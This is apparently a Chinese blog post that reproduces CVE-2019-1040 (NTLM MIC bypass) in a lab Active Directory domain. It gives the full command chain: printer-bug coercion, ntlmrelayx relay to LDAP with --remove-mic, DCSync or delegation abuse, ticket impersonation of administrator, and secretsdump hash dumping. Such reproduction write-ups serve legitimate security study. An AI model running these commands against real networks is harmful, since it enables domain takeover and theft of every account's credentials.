CVE-2019-1040 原理及复现

已于 2022-10-16 22:26:39 修改
阅读量2k 收藏 4
点赞数 1
分类专栏: 内网渗透 文章标签: 服务器 网络 运维
于 2022-10-07 22:21:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/127200356
版权

CVE-2019-1040 复现

原理

​ CVE-2019-1040漏洞的实质是NTLM数据包完整性校验存在缺陷,攻击者可以利用该漏洞绕过NTLM MIC(消息完整性检查),修改NTLM身份验证流程中的签名要求(将TLMSSP_NEGOTIATE_ALWAYS_SIGN,NTLMSSP_NEGOTIATE_SIGN,NEGOTIATE_KEY_EXCHANGE,NEGOTIATE_VERSION置0),NEGOTIATE_KEY_EXCHANGE和NEGOTIATE_VERSION位置为0,就不再检验MIC了。攻击链中攻击者修改了数据包中阻止从SMB转发到LDAP的标志,并尝试中继到目标服务器。不强制执行签名的服务器都易受到攻击(域内只有域控制器强制签名smb,ldap为协商签名),通过这种攻击能使攻击者在仅有一个普通域账号的情况下可远程控制 Windows 域内的任何机器,包括域控服务器。

利用方法

利用1-exchange

​ 通过printerbug使exchange机器向攻击机发送认证回连攻击者的机器,再使用ntlmrelayx --remove-mic参数绕过NTLM MIC校验,将smb中继到LDAP进行身份认证。

​ 打印机的spoolsv.exe服务允许用户远程调用,当用户向RemoteFindFirstPrinterChangeNotificationEx该函数传入一个UNC路径进行更新作业,打印机服务就回去请求该UNC路径,由于spoolsv.exe是system权限运行的,使用该账户对网络资源进行身份验证可能会出现安全问题,所以就迫使打印机更新作业的请求为机器账户

​ 这里为什么是使用exchange的机器对我们发起认证,是因为Exchange机器账号有WriteACL的权限,为攻击者指定的帐户授予DCSync,随后攻击者使用secretsdump导出域内哈希。

利用2-Kerberos 委派

​ 与exchange攻击方式相同,只是在执行ntlmrelayx.py 本时,需要使用 --delegate-access 选项,delegate-access 选项将中继计算机帐户(这里即辅助域控制器)的访问权限委托给攻击机器。

复现

利用-exchange

192.168.3.4 kali 攻击机

192.168.3.9 域控机器

192.168.3.144 域控(exchange)

域内用户:rootkit.org\jerry

利用打印机漏洞

利用打印机漏洞,使用域用户jerry使用exchange对我的kali进行认证。

python3 printerbug.py rootkit.org/jerry@192.168.3.144 192.168.3.4

在这里插入图片描述

利用ntlmrelayx.py脚本中继攻击

利用ntlmrelayx.py脚本进行NTLM中继攻击,设置SMB服务器并将认证凭证中继到LDAP协议。

该脚本会判断当前用户是否具有 创建用户,将用户添加到Enterprise Admins的权限,修改域ACL。

python3 ntlmrelayx.py --remove-mic --escalate-use jerry -t ldap://192.168.3.9 -smb2support

清除Mic标志
--remove-mic

指定要提升权限的用户
–escalate-user

指定中继到kali的ldap协议
-t

这里可以看到向我们发起请求的是OWA2013$ exchange的机器用户,Exchange机器账号有WriteACL的权限,为攻击者指定的帐户授予DCSync,随后攻击者使用secretsdump导出域内哈希。

在这里插入图片描述

在这里插入图片描述

使用当前用户dcsync
python3 secretsdump.py rootkit.org/jerry@192.168.3.9 -just-dc

在这里插入图片描述

利用Kerberos委派

192.168.3.4 kali 攻击机

192.168.3.9 辅助域控机器

192.168.3.144 域控(exchange)

域内用户:rootkit.org\jerry

利用1 添加机器用户设置约束委派

添加一个机器账户
python3 addcomputer.py -computer-name '9z1nc' -computer-pass '9z1nc' -dc-ip 192.168.3.9 'rootkit.org/jerry:Admin12345' -method SAMR -debug

在这里插入图片描述

利用ntlmrelayx.py脚本中继攻击
python3 ntlmrelayx.py --remove-mic --escalate-user 9z1nc$ -t ldap://192.168.3.144 -smb2support --delegate-access

--escalate-user 参数设置9z1nc$资源委派
--delegate-access 将中继计算机帐户DC$(辅助域控制器)的访问权限委托给kali攻击机

触发辅助域控制器回连kali攻击机,这里回连认证的用户就是dc$用户

这里可以看到设置了9z1nc$到DC$辅助域控制器的约束委派授权,后续使用9z1nc$用户去申请

在这里插入图片描述

迫使辅助域控向我们发送认证
python3 printerbug.py rootkit.org/jerry:Admin12345@192.168.3.9 192.168.3.4

在这里插入图片描述

模拟administrtaor用户票据
python3 getST.py -spn host/dc.rootkit.org 'rootkit.org'/'9z1nc$:9z1nc' -impersonate administrator

9z1nc$到dc$的s4u2self,通过-impersonate参数模拟用户administrator的票据,获取administrator的权限

注意:这里为了能访问到dc.rootkit.org我在kali 的host文件中加了一条192.168.3.9 dc.rootkit.org

在这里插入图片描述

利用secretsdump.py导出域内hash

导入刚刚生成的票据,即可访问到辅助域控制器,在目标主机(辅助域控制器)上模拟administrator身份,利用secretsdump转储哈希值。

export KRB5CCNAME=administrator@host_dc.rootkit.org@ROOTKIT.ORG.ccache
python3 secretsdump.py -k -no-pass dc.rootkit.org -just-dc

在这里插入图片描述

evilxpl
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2019-2888:WebLogic EJBTaglibDescriptor XXE扩展(CVE-2019-2888)
03-09
CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞 fernflower.jar weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ╭─root@jas502n /var ╰─# find ./ |grep EJBTaglibDescriptor  :...
探索网络安全的新境界:CVE-2019-1040扫描器使用指南
最新发布
gitblog_00053的博客
06-07 312
探索网络安全的新境界:CVE-2019-1040扫描器使用指南 项目地址:https://gitcode.com/fox-it/cve-2019-1040-scanner 在这个数字化时代,网络安全是不容忽视的要塞。面对日益复杂的威胁环境,开发者和安全研究人员携手打造了一系列强大的工具,以应对各种潜在的漏洞。其中,一款基于Impacket库的开源工具——CVE-2019-1040 Scanner,...
CVE-2019-1040 NTLM MIC 绕过漏洞
军火库
08-10 463
参数的含义如下:* --remove-mic:用于绕过NTLM的消息完整性校验* --esclate-user:用于指定用户DCSync权限* -t:将认证凭据中继到指定LDAP* -smb2support:用于支持SMB2协议* --no-dump: 表示获得DCSync权限后不导出域内所有用户的Hash* -debug:用于显示日志信息。如图所示,可以看到该脚本首先会遍历中继的机器账户的权限,发现目标Exchange服务器的机器账户在域内的机器账户拥有创建和修改域ACL的权限。以下实验基于这种情况。
探索网络安全新境界:CVE-2019-1040 工具
gitblog_00032的博客
05-26 385
探索网络安全新境界:CVE-2019-1040 工具 项目地址:https://gitcode.com/Ridter/CVE-2019-1040 在信息安全的世界中,漏洞利用是一种独特且强大的技能,而今天我们将介绍的开源项目正是这个领域的佼佼者 —— CVE-2019-1040。这个工具是针对2019年发现的一个重大安全漏洞的有效利用方法,它简化了对Exchange服务器的攻击,并可能进一步获得域...
内网大杀器利用:CVE-2019-1040漏洞
systemino的博客
06-16 8487
概述 微软官方在6月补丁日中,发布了一枚重磅漏洞CVE-2019-1040的安全补丁。该漏洞存在于Windows大部分版本中,攻击者可以利用该漏洞可绕过NTLM MIC的防护机制,结合其他漏洞和机制,某些场景下可以导致域内的普通用户直接获取对于域控服务器的控制。 近日,对于此漏洞的利用细节被安全研究人员公布出来,利用此漏洞获取内网的控制变得非常可行,看他堪称内网大杀器,形成现实的巨大...
内网渗透(八十二)之 CVE-2019-1040 NTLM MIC 绕过漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-24 1033
2019年6月11日,微软发布6月份安全补丁更新。在该安全补丁更新中,对 CVE-2019-1040 漏洞进行了修复。该漏洞存在于Windwos 大部分版本中,当中间人攻击者能够成功绕过NTLM 消息完整性校验(MIC)时,Windows 存在可能可篡改的漏洞。成功利用此漏洞的攻击者可以获得降级 NTLM 安全功能的能力。要利用此漏洞,攻击者需要篡改NTLM 交换,然后修改NTLM 数据包的标志,而不会使签名无效。结合其他漏洞和机制,在某些场景下,攻击者可以在仅有一个普通账户域账户的情况下接管全域。
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5502
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
CVE-2019-1040:带有交换的CVE-2019-1040
05-24
CVE-2019-1040 很棒的文章! 。 因此,我编写了CVE-2019-1040.py以便于使用。 您还可以查看我的exchange2domain存储库: : ,这是使用Exchange获取DC的另一种方法。 要求 这些工具需要。 您可以使用pip install impacket从pip安装它。 用法 usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD] [--hashes HASHES] [--smb-port [destination port]] -ah ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
"蠕虫级"的高危远程漏洞CVE-2019-0708工具一个直接不重启修补一个检测.zip
05-24
与黑客争分夺秒,亲测可用RDP远程漏洞热补丁工具,官网正品资源
CVE-2020-15778漏洞复现学习
Dasdwer的博客
04-11 2313
漏洞公开披露2020年7月18日,openssh 8.3p1的SCP命令存在命令注入漏洞,攻击者可以利用此漏洞执行任意命令。
CVE漏洞复现-CVE-2023-32233 NetFilter权限提升
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 3234
Netfilter是Linux 内核中的网络数据包处理框架(iptables)通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理具体,详情请见。
CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-11 1929
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。受影响范围:JDK >= 9不受影响的版本JDK < 9。
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3426
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
CVE-2019-1405和CVE-2019-1322:通过UPnP Device Host和Update Orchestrator服务进行权限提升
NOSEC2019的博客
11-15 1360
介绍 这篇文章主要讲述了由NCC Group研究人员所发现的两个通过COM本地服务进行非法提权的漏洞。第一个漏洞CVE-2019-1405是COM服务中的一个逻辑错误,可让本地普通用户以LOCAL SERVICE身份执行任意命令。第二个漏洞CVE-2019-1322是一个简单的服务配置错误,可让本地SERVICE组中的任何用户重新配置以SYSTEM权限运行的服务(此漏洞也被其他研究人员发现)。当...
2.2CVE-2022-34918漏洞复现技术原理
06-10
由于CVE-2022-34918是一种nftables堆溢出漏洞,需要构造特定的nftables规则才能触发漏洞,因此复现该漏洞需要具备一定的技术水平。 具体来说,复现CVE-2022-34918漏洞的步骤如下: 1. 搭建测试环境:需要在一台Linux系统上搭建nftables环境,以及安装一些必要的工具,如gcc、make、gdb等。 2. 构造恶意规则:需要构造一个特定的nftables规则,以触发CVE-2022-34918漏洞。具体来说,可以通过在规则中使用特定的操作符和参数,向nftables传递恶意数据,从而导致堆溢出。 3. 触发漏洞:使用nft命令加载并执行构造好的恶意规则,从而触发CVE-2022-34918漏洞。 4. 利用漏洞:如果漏洞成功触发,可以使用一些调试工具如gdb来进一步分析漏洞,并尝试利用该漏洞执行任意代码或者进行拒绝服务攻击。 需要注意的是,复现CVE-2022-34918漏洞需要具备一定的技术水平,同时需要谨慎操作,以免对测试环境和实际系统造成不必要的影响。建议仅在专业人士的指导下进行相关操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值